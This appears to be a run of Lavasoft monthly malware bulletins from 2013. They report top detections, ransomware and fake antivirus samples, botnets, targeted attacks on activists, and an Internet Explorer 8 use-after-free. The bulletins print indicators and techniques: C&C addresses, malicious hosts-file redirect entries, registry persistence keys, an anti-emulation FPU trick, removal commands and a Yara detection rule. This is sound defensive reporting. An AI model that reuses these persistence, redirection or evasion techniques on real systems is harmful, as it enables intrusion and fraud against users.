Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

March sees the increased activity of Virus.VBS.Ramnit.a, a script virus written in Visual Basic Script, previously described in a Lavasoft whitepaper published in May 2012. A modification of the ZeroAccess Trojan.Win32.Sirefef.bb has re-entered the Top 20 at position 19 suggesting a drop in prevalence compared to January. March sees a new modification of Email-Worm.Win32.Brontok.ik at position 16 and Virus.Win32.Sality.atbh at position 17. In March, INF.Autorun increased by 9 positions compared to February. Attackers continue to exploit this old method to spread malicious programs; it’s continued prevalence can be attributed to the autorun/autoplay feature on compromised machines being enabled.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

New malicious programs entered the Top 20

Virus.Win32.Expiro.bc entered the Top 20 at position 3 in February and remains at that position. March sees the appearance of a new Trojan program, Trojan.Win32.Tepfer.a, designed to steal user’s confidential data as well as a fake antivirus, FraudTool.Win32.FakeRean.i, entering the Top 20 at positions 10 and 12 respectively. See below for examples of FraudTool.Win32.FakeRean.i and more fake antivirus programs whose interfaces make up our Rogues gallery in March.

Fake AV (MD5: 61ea70df4955cdcd61cc8064bde3afc1) is detected by Ad-Aware as Trojan.Win32.Generic!BT

Fake AV (MD5: 33caefd51a53042c5e4c783d73a006e6) is detected by Ad-Aware as FraudTool.Win32.FakeRean.i

Fake AV (MD5: d10d8161f1b3a01bf28894eac0e553e8) is detected by Ad-Aware as FraudTool.Win32.FakeRean.i

Fake AV (MD5: 87e1e9607b2f334183f92d61b0549ccd) is detected by Ad-Aware as FraudTool.Win32.FakeSmoke

Kelihos is More Alive Than Ever

After the much publicized botnet shut down at RSA Conference , our malware analysis system registered the spam-bot using 944 public mail servers to send spam.

In March, Kelihos continues to send pharmaceutical spam e-mails:

Example of spam message sent by a bot

in an attempt to persuade users to purchase medicines to enhance sexual intimacy:

Spam emails promoting "Pengram Corporation" are also sent:

Example of spam message sent by a bot

Example of spam message sent by a bot

Trustwave SpiderLabs research shows that the botnet activity not only persists but dramatically increased after the takedown presentation. Decentralised structure of P2P botnet, packer use, and continual distribution of new modifications allow attackers to actively counteract botnet takedown attempts. Kelihos operators continue to undertake countermeasures against sinkholes.

Botnet takedowns are not a trivial task for antivirus companies, although attempts to disrupt the botnet can cause economic damage to those controlling the botnets. Efforts to disrupt botnets are hampered by ethical and privacy issues; for example, an antivirus researcher who infiltrates the botnet and issues commands to deactivate the bot software on a victim’s compromised machine is violating the victim’s privacy in the same way the botnet controller does. Furthermore, if the researcher inadvertently damages the compromised machine, the victim may attempt to take legal action against the researcher.

Targeted Attacks against Tibetan and Uyghur Activists in March

These targeted attacks have been discussed frequently, but during the last month, we noticed more references by security labs. In the middle of March, researchers from AlienVault Labs published a report describing how the attackers had been using the latest Adobe PDF exploit to attack Tibetan and Uyghur non-governmental and human rights organizations.

The malicious PDFs being sent contained exploits for the vulnerability CVE-2013-0640 which had been already patched by Adobe on the 13th of February. According to the Kaspersky Lab, the same exploit was used in the MiniDuke campaign.

Once a user opens a document, a malicious DLL is dropped into a system while a letter with the “"Noruz Bayram Merikisige Teklip” title is displayed."

According to the date stamp found inside the PDF file, it was created on 4th of February, 2013.

At the end of March, Kaspersky Lab published a report devoted to the new attack against Tibetan and Uyghur activists using Android malware.

The attack initially started with hacking the Tibetan activist’s email account. The compromised account was then used to send a spear phishing email in which attackers invite a victim to the World Uyghur Congress. The email contains the “WUC’s Conference.apk” file, a Trojan application that targets Android.

Upon installation, the application acquires the following permissions:

Once executed, the Trojan collects confidential information from a phone (phone data, contacts, location and recent victim’s calls and messages) and sends it to the C&C server (64.78.161.133):

It displays a ‘bait’ message at the same time.

The Trojan uses the “com.google.services” folder to store its files:

In addition, there are a lot of strings in the code in the Chinese language meaning that the code could be written by Chinese hackers/developers

It is thought that this is not the last attack against Tibetan and Uyghur organizations supposedly organized by the Chinese cybercriminals. Windows , MacOS and now the Android platform have been already used to run Trojans in these attacks. Which platform is going to be compromised next?

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin

Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

April sees a position change for the most prevalent generic detections: Trojan.Win32.Generic!BT and Win32.Trojan.Agent. Compared to March, new modifications of Sality Virus.Win32.Sality.r and Virus.Win32.Sality.am entered the Top 20 at positions 4 and 10 respectively. A new generic detection for Trojans written in the AutoIt script language – Trojan.Win32.AutoIt.gen.1 – entered the Top 20. A new Worm.Win32.Pykspa, a worm that can provide an attacker remote access to a compromised system, also appears in the Top 20. The worm spreads via Skype, Twitter network shares and removable drives, prevents users from visiting internet resources belonging to antivirus companies, and ends processes belonging to various utilities for diagnosing infected system,including antivirus products.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

New malicious programs entered the Top 20

April sees two new families, TrojanPWS.Win32.OnLineGames.ahj and Trojan.Win32.Urelas.a, at position 17 and 20 respectively.

TrojanPWS.Win32.OnLineGames.ahj is a dynamic-link library (DLL). It is an Internet Explorer Browser Helper Object (BHO) that is run when Internet Explorer launches. It collects data users enter on online game web sites sending the stolen data to attackers’ servers.

Trojan.Win32.Urelas.a provides an attacker with remote access to the infected computer. Taking commands from the CC server, the Trojan downloads its updates and other malicious programs, steals user’s confidential data, and collects information about the system.

This month our automatic analysis system detected an increase of ransom Trojans among Trojan.Win32.Generic!BT generic detections. Let’s consider some of them as well as options for manually removing these threats from the infected computer.

Example 1. This is what the malicious program preventing the computer from performing properly looks like:

Ransomware (MD5: 627e226a5924634651c264f033b1ba33) is detected by Ad-Aware as Trojan.Win32.Generic!BT

The Trojan is easily removed in Windows Safe Mode. The Trojan body needs to be removed from the current user's Windows directory:

%Documents and Settings%\%CurrentUser%\%AppData%\top1.exe

As well as autorun registry key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"top" = "%Documents and Settings%\%CurrentUser%\%AppData%\top1.exe"

The attackers’ server, from which an html-page blocking the computer performance is loaded, is located in Germany:

Example 2. This is what the malicious program preventing the computer from performing properly looks like:

Ransomware (MD5: 2a1864a89a64b3617fc5f233ed3f604c) is detected by Ad-Aware as Trojan.Win32.Generic!BT

It is more complicated to remove this Trojan. This is because the Trojan makes reference to itself in a more obscure registry value:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "%Documents and Settings%\%CurrentUser%\%AppData%\Battleshield.exe"

To prevent the Trojan from launching automatically in safe mode, Windows can be started in safe mode with command line support using the following commands to remove the autorun capability:

reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell

del "%Documents and Settings%\%CurrentUser%\%AppData%\Battleshield.exe"

The attackers’ server from which an html-page blocking the computer performance is loaded is located in Germany:

Example 3. This is how the malicious program preventing the computer from performing properly looks like:

Ransomware (MD5: b4cb159208511637ca06e78dbfb0af97) is detected by Ad-Aware as Trojan.Win32.Generic!BT

It is much complicated to remove this Trojan as attackers have made efforts to prevent deleting the malicious program in safe mode. After infection, the Trojan removes all keys from the registry branch:

[HKLM\System\CurrentControlSet\Control\SafeBoot]

This leads to BSOD when attempting to start Windows in safe mode:

The Trojan copies itself to the current user's Windows temporary folder:

%Temp%\WindowsUpdate.exe

If more than one user have access to the infected computer, it is possible to use the "Win+L" hot key to sign in Windows from different accounts. Afterwards, it is possible to remove the worm body and autorun registry key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate.exe" = "%Temp%\WindowsUpdate.exe"

And restore the registry branch:

[HKLM\System\CurrentControlSet\Control\SafeBoot]

Otherwise, it is required to use CD or USB flash drive to restore the system or cure infected HDD on another system by scanning it with an antivirus program, or manually removing the Trojan body.

The attackers’ server from which an html-page blocking the computer performance is loaded is located in UK:

Ad-Aware antivirus is capable of detecting ransom Trojans infections, as described above. If  your computer is infected by ransom Trojan of this type, do not panic and pay attackers a fee to unlock your computer. It is always possible to cure your system: "Fortune favours the brave".

Skyper

In April, the activity of "Skyper" IRCBot was observed. "Skyper" used social engineering techniques to spread itself using instant messaging services:

Malware memory damp fragment

If any instant messaging software was installed on the infected computer, the malware sent messages containing a link to its body to all contacts from the list. The malware works out the locale of the infected OS and sends random phrases in the corresponding language.

Text message sample for the Italian locale

Afterwards, a link created using Goo.gl service was added to the text.

http://www.goo.gl/***?image=IMG0540240-JPG

A peculiarity of the worm is installing a module designed to launch a bitcoin generator on the infected computer. The process used for bitcoin mining calculations generates significant load on the affected machine.

A process of malware module responsible for bitcoin generation

Attackers continue using various social engineering techniques to spread malware. This effective technique allows for the creation huge botnets. The chances are very high that someone receiving from a friend a message that contains the "You look so beautiful on this picture" text, along with a link, will click that link for sure.

Bitcoin mining remains a profitable business for attackers. Bitcoin currency rates help demonstrate this; the price of one BTC recently reached 260$. Sensing easy money, criminals surreptitiously install Bitcoin mining software on zombie machines in botnets.

Bitcoin Charts, resource: Mtgox

 You can read a more detailed description of spreading techniques and payload of this malware in our Malware Encyclopedia.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

According to the Net Applications statistics, Microsoft Windows is the most prevalent OS. In April the top operating systems in use were:

1. Windows 7
2. Windows XP
3. Windows Vista

In spite of the fact that Microsoft has announced it would stop supporting Windows XP on April 2014, users are not willing to abandon the operating system they are accustomed to and upgrade to new versions Windows 7 and Windows 8.

Based on the Net Applications statistics, Internet Explorer 8.0 is the most popular browser. The rate of Explorer 8.0 installations is 4 % higher than Explorer 9.

The statistics assume a 3% decrease in popularity of Explorer 8.0 for a year. This fact speaks about browser stability and users’ preferences.

Unfortunately, the statistics do not ensure computer security. Being so widespread, the browser becomes a high priority target for attackers continue to seek out and exploit new vulnerabilities.

CGenericElement Object Use-After-Free Vulnerability (MS13-038, CVE-2013-1347 ) found in May 2013 is such a vulnerability. The vulnerability exists in Microsoft Internet Explorer because the “use-after-free” error occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering.

To explore the vulnerability, let’s use an exploit that has already appeared in Metasploit Framework. We will use Windows XP SP3 with the latest updates and Internet Explorer 8 installed as a test system.

Once a web resource that contains an exploit opens, the user can see the browser pending (freezing) for several seconds making it impossible to close the browser in the usual way. The only way to end the "iexplore.exe" process is by using task manager. Meanwhile, some activity takes place in the browser process:

A notepad test module is launched and malicious code is injected into the "notepad.exe" process.

On the attacker’s server, the attack on the vulnerable system is presented as follows:

On the compromised machine, an attacker can:

• Use the system as a temporary stage to attack further targets.
• Obtain a higher level of access and get the Administrator privileges.
• Disable UAC.
• Get detailed information about OS.
• Get full access to the file system.
• Add user accounts.
• Download and launch any file.
• Steal confidential information from:
  • Browsers;
  • IM clients;
  • Skype, Bitcoin;
  • File managers;
  • FTP, SFTP, SSH, SCP clients;
  • Email clients;
  • Standard Windows storages;
  • Wireless connection system.
• Listen to the microphone, capture web-camera screenshots, track keystrokes.
• Get full control of the system using Remote Desktop.
• Restore deleted files.
• Explore network environment of the compromised system.
• Perform injections of the malicious code into the address space of any process:




Almost 24% of users have a risk of attack and infection of their PCs by attackers. These are Windows XP SP3 users and those ones who use Internet Explorer 8 as a default browser.

To prevent infection on the computer, it is recommended to enable Firewall and Automatic Updates feature and to install Ad-Aware. It is also highly recommended to be cautious when opening unknown or suspicious links in a browser.

Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

May sees new detections, Trojan.JS.Generic, written in Java Script and Worm.Win32.Vobfus.dla, written in Visual Basic. Worm.Win32.Vobfus.dla allows attackers to install additional malware on the infected computer. It spreads via network and removable drives, saving autorun.inf to the root folder of the infected drive. autorun.inf will launch the worm's executable file each time Explorer is used to open the infected drive.

Virus.Win32.Neshta.a has been discussed previously in a Lavasoft whitepaper published in March 2012 and information about Win32.Backdoor.Inject can be found in a whitepaper published in January 2013.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

New malicious programs entered the Top 20

May sees two new families in the Top 20.

Exploit.HTML.Iframe.dm is embedded as an iframe in HTML pages. Once a user opens an infected website, the URL indicated by an attacker is run in a frame 2 px high and 2 px wide.

Fragment of Exploit.HTML.Iframe.dm MD5: d69388832917ee228b14cf1e1c3fd21e

Using this technique, attackers can redirect a user to malicious websites containing exploits to execute arbitrary code on the target system.

Trojan.Win32.Qhosts.bf, written in Delphi, is designed to modify the "%System%\drivers\etc\hosts" file used to convert domain names (DNS) to IP addresses. Trojan.Win32.Qhosts.bf writes the following strings to the "hosts" file:

94.249.189.25  my.mail.ru
94.249.189.25  m.my.mail.ru
94.249.189.25  vk.com
94.249.189.25  m.vk.com
94.249.189.25  odnoklassniki.ru
94.249.189.25  m.odnoklassniki.ru
94.249.189.25  ok.ru
94.249.189.25  m.ok.ru

Opening any of the URLs mentioned above redirects all user requests to 94.249.189.25.

The Trojan extracts the file "rasstavanie.bat", two Visual Basic script files "eto.vbs" and "naverno.vbs" and "ruoshka.txt" and "mainlol.txt" files containing service information which are saved to the Program Files folder.

%Program Files%\akvi\kavi\

Command interpreter script is intended to modify the "%System%\drivers\etc\hosts" file:

Rasstavanie.bat batch file fragment

The VBS "naverno.vbs" malicious script is used to set a hidden attribute on the "%System%\drivers\etc\hosts" file. The "eto.vbs" script is used to send an HTTP GET request to the following URL:

http://94.249.188.143:9007/stat/tuk/210

When manually removing this Trojan, the following folder must be removed:

%Program Files%\akvi

Make the "%System%\drivers\etc\hosts" file accessible by displaying hidden files and folders and then restore the "%System%\drivers\etc\hosts" file content

Attackers often use this technique to block access to Internet resources or redirect users to phishing pages to steal information. If you suspect this happening, check the "hosts" file for unusual or suspicious entries.

Ransom Trojans continue to be highly prevalent threats that are frequently analysed by our automated malware analysis systems. Information on how to manually delete these threats can be found here.

Ransomware: Example 1

Ransomware (MD5: a8c05e37d057fad41dd07be3b46a8c3b) is detected by Ad-Aware as Trojan.Win32.Generic!BT

It is a dynamic library (DLL). After activation, it copies itself with a randomly generated name to the ‘all users’ Application Data folder:

%Documents and Settings%\All Users\%AppData%\1doqet.dat

The Trojan creates a link to itself in the current user's autorun Windows folder, with the "msconfig.lnk", which will launch the Trojan when the user logs in to Windows:

%Documents and Settings%\%Current User%\Start Menu\Programs\Startup\msconfig.lnk

It also adds a registry autorun key to be doubly sure that the malware survives a reboot:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE" = "%Documents and Settings%\All Users\%AppData%\rundll32.exe %Documents and Settings%\All Users\%AppData%\1doqet.dat,FG00"

To be launched, the Trojan copies the "rundll32.exe" system file to the folder:

%Documents and Settings%\All Users\%AppData%\rundll32.exe

The Trojan can be removed in the Windows Safe Mode with a command prompt option:

del %Documents and Settings%\All Users\%AppData%\1doqet.dat
del %Documents and Settings%\%Current User%\Start Menu\Programs\Startup\msconfig.lnk
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CTFMON.EXE

The attackers’ server, from which an HTML-page that essentially prevents the computer from being used is loaded, is located in United States:

Ransomware: Example 2

Ransomware (MD5: eb02341a6de903a1d869b324bc1c3ff3) is detected by Ad-Aware as Trojan.Win32.Generic!BT

As in the previous example, the Trojan can be removed in Windows Safe Mode with a command. To remove the Trojan executable file, use the command prompt:

del %Documents and Settings%\%Current User%\%AppData%\skype.dat

… delete the affected registry autorun key using the command prompt:

reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v shell

The HTML-page blocking the computer performance is located in Netherlands:

In May, our automated malware analysis system also revealed new fake antiviruses which did not make it into the Top 20. Be cautious of this common scam - the threats detected by these programs do not exist on your PC! You can see what a common fake AV infection procedure looks like on Lavasoft’s Facebook page.

Fake AV (MD5: 984539c28d5c916be994c5eda5829be1) is detected by Ad-Aware as FraudTool.Win32.FakeRean

Fake AV (MD5: 7d7274a1cae4fc938ae4921ea74e7254) is detected by Ad-Aware as FraudTool.Win32.FakeRean.e

Fake AV (MD5: e5a17537734661574a839584398b85c8) is detected by Ad-Aware as Trojan.Win32.FakeAV.gbd

Fake AV (MD5: f6d881ab2eac9a7a399586b655cc895e) is detected by Ad-Aware as Trojan.Win32.Generic!BT

All threats described above are successfully detected by Ad-Aware Antivirus. Never pay a fee to attackers!

Update Windows to Avoid Vulnerability Exploits

At the beginning of May, a new exploit was detected on the Department of Labor’s (DoL) official web site. The exploit took advantage of a vulnerability in Internet Explorer 8. A “use-after-free” condition occurred when a CGenericElement object was freed, but a reference was kept on the Document and used again during rendering. Successful exploitation could allow an attacker to exploit this vulnerability and execute arbitrary code on the affected system.

According to the Net Applications statisctics, 23% of Internet Explorer 8 users were the group most at risk, while all Windows XP SP3 users may have been exposed to potential risks. We suppose that an attacker could perform the following actions on the affected system:

• Use the system as a temporary stage to attack further targets.
• Obtain a higher level of access i.e. Administrator privileges.
• Disable UAC.
• Get detailed information about OS.
• Get full access to the file system.
• Add user accounts.
• Download and launch any file.
• Steal confidential information from:

- Browsers;

- IM clients;

- Skype, Bitcoin;

- File managers;

- FTP, SFTP, SSH, SCP clients;

- Email clients;

- Standard Windows storages;

- Wireless connection system.

• Listen to the microphone, capture web-camera screenshots, track keystrokes.
• Get full control of the system using Remote Desktop.
• Restore deleted files.
• Explore network environment of the compromised system.
• Perform injections of the malicious code into the address space of any process.

For detailed information about the threat, visit.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

 Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

June sees the most prevalent generic detection for Trojans – Malware.JS.Generic - written in Java Script. The majority of threats come from the Internet. Ad-Aware successfully detects those threats and keeps users’ PCs safe.

Three new families entered the Top 20. Trojan-Clicker.HTML.Iframe, in thirteenth position, is designed to increase site visitor statistics, discussed previously in a Lavasoft whitepaper published in June 2012

Virus.Win32.Virut.ce, in sixteenth position, was discussed previously in a Lavasoft whitepaper published in April 2012, and a new generic detection for the multifunctional Trojans Zbot Packed.Win32.PWSZbot.gen.cy is in seventeenth position. Information about some modifications can be found here and here.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

New malicious programs entered the Top 20

June sees Trojan.Win32.PSW.gz entering the Top 20 and occupying the eighth position. The Trojan is designed to steal confidential data from World of Warcraft user accounts. It was mentioned for the first time in a whitepaper published in May 2012. Trojans were particularly active in stealing online game accounts during that time and this tend is likely to continue this summer.

FraudTool.Win32.FakeRean is in the nineteenth position, discussed previously in a Lavasoft whitepaper published in April 2012.

Worm.Win32.Gamarue.aa occupies the sixteenth position. The worm’s modifications can spread as email attachments and via removable drives; they can send information about the compromised system to the command server, download from the Internet and then launch other malicious programs. Depending on the attacker’s commands, the worm can steal confidential data.

The flood of ransomware blocking the computer performance shows no signs of dissipating. Our automated malware analysis system detected an interesting sample, Trojan.Win32.Generic!BT, among the generic detections. It was detected by the minority of antivirus vendors.

Detecting a malicious program MD5: b55cd45af00206933005d9eb1d5cfc4c on the online service virustotal.com

The sample was compiled in May 14, 2013. According to the detection ratio, it is detected only by 17 antivirus programs. Up to now the sample is topical.

File details MD5: b55cd45af00206933005d9eb1d5cfc4c virustotal.com

The original name the Trojan spreads is "visfx.exe":

Original Trojan name MD5: b55cd45af00206933005d9eb1d5cfc4c

The Trojan is written in .Net. The main program window that blocks the computer is presented below:

Ransomware (MD5: b55cd45af00206933005d9eb1d5cfc4c) is detected by Ad-Aware as Trojan.Win32.Generic!BT

The blocking window does not close when the following URL opens in your browser even after clicking the "Link1" or "Link2" button:

http://unlck.com/1md

You are then directed to proceed with the steps below to unlock your computer:

 http://unlck.com/1md Internet resource content

You may be asked to participate in online gambling, be presented with competitions to win an iPhone 5 by sending a paid text message to a short number, submit online application form indicating your confidential data, download a free application which is a malicious program, and other fraud schemes. Obviously, affected users should not participate.

A particularity of the Trojan is that all components of the blocking window are downloaded from the legal file sharing service Dropbox:

hxxps://dl.dropbox.com/s/zb9jt8hr5vfr525/1024X576.png
hxxps://dl.dropbox.com/s/id3z6oobm2a7gou/1366X768.png
hxxps://dl.dropbox.com/s/wh4pc80c5jl9iw4/1600X900.png
hxxps://dl.dropbox.com/s/xu929toh5cyid30/screen.png
hxxps://dl.dropbox.com/s/0ej33arbrxrndq1/lock-screen.png
hxxps://dl.dropbox.com/s/c8luiic5kqckr5x/link1.png
hxxps://dl.dropbox.com/s/1bfzv4c0njg58j1/link2.png
hxxps://dl.dropbox.com/s/plpofi8486lkung/verify.png

Being successfully downloaded, they are saved to the current user's Windows folder %Application Data%.

Attackers do not use any packers and crypters and download their components from Dropbox disguising the malware as legal one. The anomalies in the executable files and network activity make it difficult to detect for antivirus vendors.

To prevent the deletion, the Trojan ends the following processes: taskmgr.exe, regedit.exe, cmd.exe, msconfig, amongst others:

List of processes the Trojan ends MD5: b55cd45af00206933005d9eb1d5cfc4c

The Trojan can be easily removed in Windows Safe Mode. Deletion of the following keywith the help of registry editor is required:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Audio Drivers" = "<original file name>.exe"

To remove the Trojan completely, it is required to remember the path to the Trojan original file taken from the "Audio Drivers" parameter before removing the autorun key.

In an effort to make removal more difficult, attackers built in a removal sequence that requires an activation code. It can be found in a resource of the Trojan executable file:

Audio_Drivers.Resources

When the "unlockmypcplease01" code is entered, the Trojan is removed from your PC showing the following message:

 Successful unlock message

Each successful unlock process is reported to the attacker’s server:

http://forcesurvey.3jelly.com

The server is located in the United States:

Attacker’s server location

Below are statistics we managed to retrieve from the attacker’s server:

Threat statistics from the server http://forcesurvey.3jelly.com

A majority of people tried to pass three steps to unlock their computers. Be careful to avoid these mistakes.

In June, our automated malware analysis system also revealed new fake antiviruses which did not enter the Top 20. Be careful! All "threats" detected by these programs are fake – they are designed to trick you into believing your machine is infected.

Fake AV (MD5: 83146ad25c67506c1e0ce3abd3bf0564) is detected by Ad-Aware as FraudTool.Win32.FakeRean.i

Fake AV (MD5: ca1ecf7e2a26fd8e9ca1b9326c9d1b57) is detected by Ad-Aware as LooksLike.Win32.Malware!D

 Fake AV (MD5: 15bc8488c79059cda1ef9197dbea50b0) is detected by Ad-Aware as Trojan.Win32.Kryptik.argh

All threats described above are successfully detected by Ad-Aware. Ransomware and fake antivirus target unsuspecting computer users making them pay a fee to unlock their computers.

Chinese NetTraveler

On June 4 Kaspersky Lab published a report devoted to the NetTraveler cyber-espionage campaign that covers more than 350 victims in 40 countries. The compromised organizations include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors. The most affected countries are Mongolia, Russia, India and Kazakhstan. Based on the analysis of C&C scripts and the NetTraveler’s communication protocol, researchers concluded that the spy-tool originated in China. Also common targets with the "Red October" campaign were found in Russia, Iran, Belgium, Kazakhstan, Belarus and Tadjikistan.

The attacks started with sending spear-phishing e-mails to victims with MS Office documents in attachment which exploit CVE-2012-0158 and CVE-2010-3333 vulnerabilities. A moment later the spy-tool is installed being able to collect private information, compress it and send to the attacker. By default, it looks for DOC, XLS, PPT, RTF and PDF documents on a victim’s computer but the list can be extended in a configuration file.

To protect your computer, it is recommended to install an antivirus with the latest definitions as well as to download and apply security updates for already installed software.

The malicious components are detected by Ad-Aware as Trojan.Win32.Generic!BT

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Our automated malware analysis system, Lavasoft MAS, recently revealed an interesting incident. A system was infected by three IRC bots at a time: Nrgbot, Blazebot and Rbot. Analysis of Rbot showed that at least two C&C servers existed from which commands can be received by three bots at a time.

Each bot can periodically download updated modifications by commands issued via IRC. This causes difficulties in attempts to disinfect the compromised system. Detection rates for the latest modification of Rbot are shown below.

We revealed an interesting collection of IRC bots created by attackers.

The fact that the Nrgbot builder and source code as well as Rbot source code have become public and are returned as first results in google searches, gives attackers a wide range of possibilities on the affected system.

Top20 Blocked Malware

The Top 20 malicious programs blocked on PCs

July sees a new leader in the Top 20, Backdoor.Win32.VB.lvn detection, written in Visual Basic. The malware provides an attacker with access to the compromised system.

A detection for autorun.inf, INF.Autorun, takes the forth position. The file is used by worms to spread. In July, Ad-Aware detected and disinfected an increased number of these infections.

New apperances include Trojan.Win32.Generic!SB.0 and a modification of Sality, Virus.Win32.Sality.ek, previously examined in the first Lavasoft whitepaper published in March 2012.

Win32.Backdoor.Inject,discussed previously in a Lavasoft whitepaper published in January 2013, is a generic detection for malicious programs which inject malicious code into running processes. The injected code is used by attackers to get access to the compromised system.

Worm.Win32.Taterf.b is a worm spread through all logical, network and removable drives and is capable of disabling antivirus services. Its main payload is stealing online game users’ data, for games such as Age of Conan, Online Pool, Chain of Command and Knight Online.

During the summer, online game users are frequently the target for malware authors. This can be explained by the fact that vacation time sees an increase in online gaming activity.

Trojan-Dropper.Win32.Agent is a detection for Trojan programs which install other malicious programs as well as potentially unwanted software on the system.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

New malicious programs entered the Top 20

July sees four new detections in the Top 20. Worm.Win32.Pykspa, discussed previously in a Lavasoft whitepaper published in April 2013; Trojan.Win32.Autorun.dm, which entered the Top 20 for the first time in August 2012 is designed to automatically run malicious programs; Trojan-Downloader.Win32.LoadMoney and Trojan-Dropper.Win32.Gepys.a.

Trojan-Downloader.Win32.LoadMoney.s is a Trojan program which installs other malicious programs on the compromised system without user’s knowledge. Mail.ru previously used a downloader that installed the Mail.ru.Guard and Mail.ru.Sputnik utilities without user’s knowledge. Some antivirus vendors detected this malicious program as "not-a-virus LoadMoney". We categorise such programs as “Trojan” because it is unacceptable for legal software to install a program without user’s knowledge.

Trojan-Dropper.Win32.Gepys.a is a Trojan that installs other malicious programs on the system. As a rule, it is a dynamic link library (DLL) saved in the "All Users" profile to the %AppData%\Mozilla folder under a randomly generated name. The automatic launch of a DLL at each running process is caused by changes to the "AppInit_DLLs" system registry key:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows]

Fake antiviruses holding machines to ransom until a fee is paid to unlock their computers continue to blight users. In July, our systems detected the following fake antiviruses:

Fake AV (MD5: 5a88b972fcf39d2f5b0fb941b76f54c6) is detected by Ad-Aware as Trojan.Win32.FakeAV.IS

Fake AV (MD5: 7b8763eb682cef61090c7eeb3f6e408d) is detected by Ad-Aware as Trojan.Win32.Jorik.Fraud.un

Fake AV (MD5: 51f39bed9b38cd74ce3020e9e7b9730f) is detected by Ad-Aware as Trojan.Win32.FakeAv.awrp

Undocumented FPU instructions

In June, Microsoft published the results of its investigation into a new undocumented instruction trick AlienVault Labs subsequently published "Hunting for malware with undocumented instructions". The following malware samples use FPU instructions that lead to incorrect disassembly in several debuggers and disassemblers: Backdoor:Win32/Farfli.AV, Trojan:Win32/Danglo, Backdoor:Win32/Zegost.B were detected.

Based on a Yara rule from AlienVault Labs, in July, we added the following Yara rule to Lavasoft MAS:

rule undocumentedFPUinstructions
{
    strings:
        $a1 = {D9 D8}
        $a2 = {DF DF}
    condition:
        ($a1  in (entrypoint..entrypoint+12)) or ($a2  in (entrypoint..entrypoint+12)) or (for any of ($a*) : ($ at entrypoint))
}

Our automated analysis systems detected the following samples:

MD5: 0f66f960852d1c9fb184e4813143aa90, detected by Ad-Awar as Trojan.Win32.Bdoor.bdk, detected by Microsoft as Backdoor:Win32/Zegost.AD

MD5: 5eb3a32051320dc1b3caa6e554a54ffb, detected by Ad-Aware us Trojan.Win32.Generic!BT, detected by Microsoft asBackdoor:Win32/Racdr.A

MD5: 011d1e05bb63314922936d02b63a7a93, detected by Ad-Aware us Trojan.Win32.Generic!BT, detected by Microsoft as DDoS:Win32/Nitol.A

MD5: cf9ee9be74908e1c8c3b2ee607812743, detected by Ad-Aware us Trojan.Win32.Generic!BT, detected by Microsoft as Backdoor:Win32/Babmote.A

MD5: e2bdc9e611a6cbe3f637165dcd14990c, detected by Ad-Aware us Trojan.Win32.Redosdru.C, detected by Microsoft as Backdoor:Win32/Babmote.A

All files, apart from DDoS:Win32/Nitol.A were not packed. DDoS:Win32/Nitol.A was packed by RLPack. Attackers might use special means to add those instructions to the executable files after compiling and packing. We tried to reproduce attackers’ actions experimenting with a legitimate file, notepad.exe, by modifying an entry point:

MD5: 394f5fd5696cca3648a53a179da66059

Afterwards, the file was uploaded to virustotal.com:

Two antivirus vendors added detection of undocumented instructions even in white files. The trick can be used by attackers to counteract emulators of antivirus companies.

Tandem-type IRC Bots

In July, an interesting infection incident was detected by our automated malware analysis system, Lavasoft MAS. Three IRC bots were simultaneously detected on the compromised system: Nrbot, Blazebot and Rbot.

Two C&C servers were detected from which commands can be received by Nrgbot (channel #nrz#), Rbot(channel #fkyou# ) and Blazebot (channel ##TBT). The auto-join channel "#Security-Check" for all bots:

178.33.232.15
146.82.5.222

By using Internet Relay Chat client mIRC and connecting to C&C servers, it is possible to track the current commands bots receive. When the description was created, the same commands were received from two servers:

